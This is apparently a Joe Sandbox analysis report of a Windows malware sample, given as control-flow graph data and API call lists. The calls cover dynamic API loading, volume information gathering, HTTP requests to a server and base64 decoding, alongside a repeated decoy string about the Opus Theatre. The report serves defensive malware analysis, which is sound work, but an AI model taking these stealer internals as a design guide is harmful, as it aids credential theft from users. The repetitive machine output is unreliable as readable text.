47059->47061 47060->46115 47061->47022 47061->47023 47061->47024 47061->47025 47061->47026 47061->47027 47061->47033 47061->47034 47061->47043 47061->47044 47061->47055 47061->47058 47061->47059 47063 4176e3 GetVolumeInformationA 47062->47063 47064 4176dc 47062->47064 47065 417721 47063->47065 47064->47063 47066 41778c GetProcessHeap HeapAlloc 47065->47066 47067 4177a9 47066->47067 47068 4177b8 wsprintfA 47066->47068 47069 41aa50 lstrcpy 47067->47069 47070 41aa50 lstrcpy 47068->47070 47071 415ff7 47069->47071 47070->47071 47071->46136 47073 41aab0 lstrcpy 47072->47073 47074 
4048e9 47073->47074 47280 404800 47074->47280 47076 4048f5 47077 41aa50 lstrcpy 47076->47077 47078 404927 47077->47078 47079 41aa50 lstrcpy 47078->47079 47080 404934 47079->47080 47081 41aa50 lstrcpy 47080->47081 47082 404941 47081->47082 47083 41aa50 lstrcpy 47082->47083 47084 40494e 47083->47084 47085 41aa50 lstrcpy 47084->47085 47086 40495b InternetOpenA StrCmpCA 47085->47086 47087 404994 47086->47087 47088 4049a5 47087->47088 47089 404f1b InternetCloseHandle 47087->47089 47293 418cf0 GetSystemTime lstrcpy lstrcpy 47088->47293 47091 404f38 47089->47091 47288 40a210 CryptStringToBinaryA 47091->47288 47092 4049b3 47294 41ac30 lstrcpy lstrcpy lstrcatA 47092->47294 47095 4049c6 47097 41abb0 lstrcpy 47095->47097 47102 4049cf 47097->47102 47098 41ab30 2 API calls 47099 404f55 47098->47099 47101 41acc0 4 API calls 47099->47101 47100 404f77 codecvt 47104 41aab0 lstrcpy 47100->47104 47103 404f6b 47101->47103 47106 41acc0 4 API calls 47102->47106 47105 41abb0 lstrcpy 47103->47105 47117 404fa7 47104->47117 47105->47100 47107 4049f9 47106->47107 47108 41abb0 lstrcpy 47107->47108 47109 404a02 47108->47109 47110 41acc0 4 API calls 47109->47110 47111 404a21 47110->47111 47112 41abb0 lstrcpy 47111->47112 47113 404a2a 47112->47113 47295 41ac30 lstrcpy lstrcpy lstrcatA 47113->47295 47115 404a48 47116 41abb0 lstrcpy 47115->47116 47118 404a51 47116->47118 47117->46139 47119 41acc0 4 API calls 47118->47119 47120 404a70 47119->47120 47121 41abb0 lstrcpy 47120->47121 47122 404a79 47121->47122 47123 41acc0 4 API calls 47122->47123 47124 404a98 47123->47124 47125 41abb0 lstrcpy 47124->47125 47126 404aa1 47125->47126 47127 41acc0 4 API calls 47126->47127 47128 404acd 47127->47128 47296 41ac30 lstrcpy lstrcpy lstrcatA 47128->47296 47130 404ad4 47131 41abb0 lstrcpy 47130->47131 47132 404add 47131->47132 47133 404af3 InternetConnectA 47132->47133 47133->47089 47134 404b23 HttpOpenRequestA 47133->47134 47136 404b78 47134->47136 47137 404f0e InternetCloseHandle 47134->47137 47138 41acc0 4 API 
                                              • Control-flow graph node/edge data for the preceding functions (interactive graph, not rendered). APIs recorded on its edges: lstrcpy, lstrcatA, lstrlenA, HttpSendRequestA, InternetReadFile, InternetCloseHandle, StrCmpCA, strtok_s, ExitProcess, InternetCrackUrlA, LocalAlloc, CryptStringToBinaryA, LocalFree, CreateToolhelp32Snapshot, Module32First, VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA, SetErrorMode, GetPEB.

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              • Graph data (interactive graph, not rendered): basic blocks 419f20-41aa19, consisting of runs of GetProcAddress calls (43, 5, 8, 5, 6, 9, 5, 2, 2, 10, 4, 1 and 4 calls per block) and one block of 8 LoadLibraryA calls at 41a346-41a3da; the individual call sites are listed under APIs.
                                              APIs
                                              • GetProcAddress.KERNEL32(75900000,02C9C9C0), ref: 00419F3D
                                              • GetProcAddress.KERNEL32(75900000,02C9CA00), ref: 00419F55
                                              • GetProcAddress.KERNEL32(75900000,02C9EA28), ref: 00419F6E
                                              • GetProcAddress.KERNEL32(75900000,02C9EB60), ref: 00419F86
                                              • GetProcAddress.KERNEL32(75900000,02C9EB48), ref: 00419F9E
                                              • GetProcAddress.KERNEL32(75900000,02C9EB78), ref: 00419FB7
                                              • GetProcAddress.KERNEL32(75900000,02CA0BA0), ref: 00419FCF
                                              • GetProcAddress.KERNEL32(75900000,02C9EB90), ref: 00419FE7
                                              • GetProcAddress.KERNEL32(75900000,02C9EBA8), ref: 0041A000
                                              • GetProcAddress.KERNEL32(75900000,02C9EB18), ref: 0041A018
                                              • GetProcAddress.KERNEL32(75900000,02C9EB00), ref: 0041A030
                                              • GetProcAddress.KERNEL32(75900000,02C9CC40), ref: 0041A049
                                              • GetProcAddress.KERNEL32(75900000,02C9CC60), ref: 0041A061
                                              • GetProcAddress.KERNEL32(75900000,02C9CAE0), ref: 0041A079
                                              • GetProcAddress.KERNEL32(75900000,02C9CCA0), ref: 0041A092
                                              • GetProcAddress.KERNEL32(75900000,02C9EB30), ref: 0041A0AA
                                              • GetProcAddress.KERNEL32(75900000,02C9EAE8), ref: 0041A0C2
                                              • GetProcAddress.KERNEL32(75900000,02CA0C68), ref: 0041A0DB
                                              • GetProcAddress.KERNEL32(75900000,02C9CD60), ref: 0041A0F3
                                              • GetProcAddress.KERNEL32(75900000,02CA4FB0), ref: 0041A10B
                                              • GetProcAddress.KERNEL32(75900000,02CA4E78), ref: 0041A124
                                              • GetProcAddress.KERNEL32(75900000,02CA4FC8), ref: 0041A13C
                                              • GetProcAddress.KERNEL32(75900000,02CA4FE0), ref: 0041A154
                                              • GetProcAddress.KERNEL32(75900000,02C9CCC0), ref: 0041A16D
                                              • GetProcAddress.KERNEL32(75900000,02CA4F68), ref: 0041A185
                                              • GetProcAddress.KERNEL32(75900000,02CA5130), ref: 0041A19D
                                              • GetProcAddress.KERNEL32(75900000,02CA50B8), ref: 0041A1B6
                                              • GetProcAddress.KERNEL32(75900000,02CA50E8), ref: 0041A1CE
                                              • GetProcAddress.KERNEL32(75900000,02CA5058), ref: 0041A1E6
                                              • GetProcAddress.KERNEL32(75900000,02CA50D0), ref: 0041A1FF
                                              • GetProcAddress.KERNEL32(75900000,02CA5100), ref: 0041A217
                                              • GetProcAddress.KERNEL32(75900000,02CA5118), ref: 0041A22F
                                              • GetProcAddress.KERNEL32(75900000,02CA4FF8), ref: 0041A248
                                              • GetProcAddress.KERNEL32(75900000,02CA08C8), ref: 0041A260
                                              • GetProcAddress.KERNEL32(75900000,02CA5148), ref: 0041A278
                                              • GetProcAddress.KERNEL32(75900000,02CA4F20), ref: 0041A291
                                              • GetProcAddress.KERNEL32(75900000,02C9CD80), ref: 0041A2A9
                                              • GetProcAddress.KERNEL32(75900000,02CA50A0), ref: 0041A2C1
                                              • GetProcAddress.KERNEL32(75900000,02C9CD20), ref: 0041A2DA
                                              • GetProcAddress.KERNEL32(75900000,02CA4F38), ref: 0041A2F2
                                              • GetProcAddress.KERNEL32(75900000,02CA4E60), ref: 0041A30A
                                              • GetProcAddress.KERNEL32(75900000,02C9CD40), ref: 0041A323
                                              • GetProcAddress.KERNEL32(75900000,02C9D080), ref: 0041A33B
                                              • LoadLibraryA.KERNEL32(02CA4EA8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A34D
                                              • LoadLibraryA.KERNEL32(02CA4E90,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A35E
                                              • LoadLibraryA.KERNEL32(02CA4EC0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A370
                                              • LoadLibraryA.KERNEL32(02CA4F50,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A382
                                              • LoadLibraryA.KERNEL32(02CA4F80,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A393
                                              • LoadLibraryA.KERNEL32(02CA4ED8,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3A5
                                              • LoadLibraryA.KERNEL32(02CA4F98,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3B7
                                              • LoadLibraryA.KERNEL32(02CA4EF0,?,00415EF3,?,00000034,00000064,004168A0,?,0000002C,00000064,00416840,?,0000003C,00000064,004167B0,?), ref: 0041A3C8
                                              • GetProcAddress.KERNEL32(75FD0000,02C9CEA0), ref: 0041A3EA
                                              • GetProcAddress.KERNEL32(75FD0000,02CA4F08), ref: 0041A402
                                              • GetProcAddress.KERNEL32(75FD0000,02C9EEB0), ref: 0041A41A
                                              • GetProcAddress.KERNEL32(75FD0000,02CA5070), ref: 0041A433
                                              • GetProcAddress.KERNEL32(75FD0000,02C9D040), ref: 0041A44B
                                              • GetProcAddress.KERNEL32(734B0000,02CA0EC0), ref: 0041A470
                                              • GetProcAddress.KERNEL32(734B0000,02C9CF20), ref: 0041A489
                                              • GetProcAddress.KERNEL32(734B0000,02CA0D58), ref: 0041A4A1
                                              • GetProcAddress.KERNEL32(734B0000,02CA5010), ref: 0041A4B9
                                              • GetProcAddress.KERNEL32(734B0000,02CA5028), ref: 0041A4D2
                                              • GetProcAddress.KERNEL32(734B0000,02C9CDC0), ref: 0041A4EA
                                              • GetProcAddress.KERNEL32(734B0000,02C9CFE0), ref: 0041A502
                                              • GetProcAddress.KERNEL32(734B0000,02CA5040), ref: 0041A51B
                                              • GetProcAddress.KERNEL32(763B0000,02C9CE40), ref: 0041A53C
                                              • GetProcAddress.KERNEL32(763B0000,02C9CE60), ref: 0041A554
                                              • GetProcAddress.KERNEL32(763B0000,02CA5088), ref: 0041A56D
                                              • GetProcAddress.KERNEL32(763B0000,02CA5178), ref: 0041A585
                                              • GetProcAddress.KERNEL32(763B0000,02C9D0C0), ref: 0041A59D
                                              • GetProcAddress.KERNEL32(750F0000,02CA0DD0), ref: 0041A5C3
                                              • GetProcAddress.KERNEL32(750F0000,02CA0A60), ref: 0041A5DB
                                              • GetProcAddress.KERNEL32(750F0000,02CA51A8), ref: 0041A5F3
                                              • GetProcAddress.KERNEL32(750F0000,02C9D100), ref: 0041A60C
                                              • GetProcAddress.KERNEL32(750F0000,02C9D120), ref: 0041A624
                                              • GetProcAddress.KERNEL32(750F0000,02CA0AD8), ref: 0041A63C
                                              • GetProcAddress.KERNEL32(75A50000,02CA5190), ref: 0041A662
                                              • GetProcAddress.KERNEL32(75A50000,02C9D0E0), ref: 0041A67A
                                              • GetProcAddress.KERNEL32(75A50000,02C9EEC0), ref: 0041A692
                                              • GetProcAddress.KERNEL32(75A50000,02CA51C0), ref: 0041A6AB
                                              • GetProcAddress.KERNEL32(75A50000,02CA5160), ref: 0041A6C3
                                              • GetProcAddress.KERNEL32(75A50000,02C9D0A0), ref: 0041A6DB
                                              • GetProcAddress.KERNEL32(75A50000,02C9CF40), ref: 0041A6F4
                                              • GetProcAddress.KERNEL32(75A50000,02CA51D8), ref: 0041A70C
                                              • GetProcAddress.KERNEL32(75A50000,02CA51F0), ref: 0041A724
                                              • GetProcAddress.KERNEL32(75070000,02C9D000), ref: 0041A746
                                              • GetProcAddress.KERNEL32(75070000,02CA5208), ref: 0041A75E
                                              • GetProcAddress.KERNEL32(75070000,02CA5220), ref: 0041A776
                                              • GetProcAddress.KERNEL32(75070000,02CA5658), ref: 0041A78F
                                              • GetProcAddress.KERNEL32(75070000,02CA5790), ref: 0041A7A7
                                              • GetProcAddress.KERNEL32(74E50000,02C9D140), ref: 0041A7C8
                                              • GetProcAddress.KERNEL32(74E50000,02C9CE00), ref: 0041A7E1
                                              • GetProcAddress.KERNEL32(75320000,02C9CDE0), ref: 0041A802
                                              • GetProcAddress.KERNEL32(75320000,02CA5568), ref: 0041A81A
                                              • GetProcAddress.KERNEL32(6F060000,02C9CEC0), ref: 0041A840
                                              • GetProcAddress.KERNEL32(6F060000,02C9CF00), ref: 0041A858
                                              • GetProcAddress.KERNEL32(6F060000,02C9CDA0), ref: 0041A870
                                              • GetProcAddress.KERNEL32(6F060000,02CA5688), ref: 0041A889
                                              • GetProcAddress.KERNEL32(6F060000,02C9CE80), ref: 0041A8A1
                                              • GetProcAddress.KERNEL32(6F060000,02C9CF60), ref: 0041A8B9
                                              • GetProcAddress.KERNEL32(6F060000,02C9CEE0), ref: 0041A8D2
                                              • GetProcAddress.KERNEL32(6F060000,02C9CFA0), ref: 0041A8EA
                                              • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0041A901
                                              • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0041A917
                                              • GetProcAddress.KERNEL32(74E00000,02CA5778), ref: 0041A939
                                              • GetProcAddress.KERNEL32(74E00000,02C9EF30), ref: 0041A951
                                              • GetProcAddress.KERNEL32(74E00000,02CA5838), ref: 0041A969
                                              • GetProcAddress.KERNEL32(74E00000,02CA56A0), ref: 0041A982
                                              • GetProcAddress.KERNEL32(74DF0000,02C9D060), ref: 0041A9A3
                                              • GetProcAddress.KERNEL32(6FBC0000,02CA5598), ref: 0041A9C4
                                              • GetProcAddress.KERNEL32(6FBC0000,02C9CF80), ref: 0041A9DD
                                              • GetProcAddress.KERNEL32(6FBC0000,02CA55B0), ref: 0041A9F5
                                              • GetProcAddress.KERNEL32(6FBC0000,02CA5748), ref: 0041AA0D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$LibraryLoad
                                              • String ID: HttpQueryInfoA$InternetSetOptionA
                                              • API String ID: 2238633743-1775429166
                                              • Opcode ID: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                              • Instruction ID: fc853244e6edf76f870e234c3061c456cb9d9aaab695e8dd72f65461d71d1d70
                                              • Opcode Fuzzy Hash: 20b608565022329c8e522603aeb206678cdaef6a3851366fd54475d7f707e8f0
                                              • Instruction Fuzzy Hash: 98623EB5D1B2549FC344DFA8FC8895677BBA78D301318A61BF909C3674E734A640CB62

                                              Control-flow Graph

                                              APIs
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040461C
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404627
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404632
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040463D
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404648
                                              • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,00416C9B), ref: 00404657
                                              • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,00416C9B), ref: 0040465E
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040466C
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404677
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404682
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 0040468D
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 00404698
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046AC
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046B7
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046C2
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046CD
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,00416C9B), ref: 004046D8
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404701
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040470C
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404717
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404722
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040472D
                                              • strlen.MSVCRT ref: 00404740
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404768
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404773
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0040477E
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404789
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 00404794
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047A4
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047AF
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047BA
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047C5
                                              • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 004047D0
                                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 004047EC
                                              Strings
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046B2
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404617
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404707
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046A7
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404643
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040471D
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040467D
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404728
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404693
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046BD
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047CB
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404784
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047B5
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404779
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046C8
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404712
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040479F
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404622
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040476E
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040478F
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404667
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047C0
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0040462D
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004047AA
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404688
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046D3
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 004046FC
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404638
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404763
                                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00404672
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2287319130.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2287319130.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.000000000056E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2287319130.00000000006E8000.00000040.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_lxEu3xfjIb.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in 
Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United 
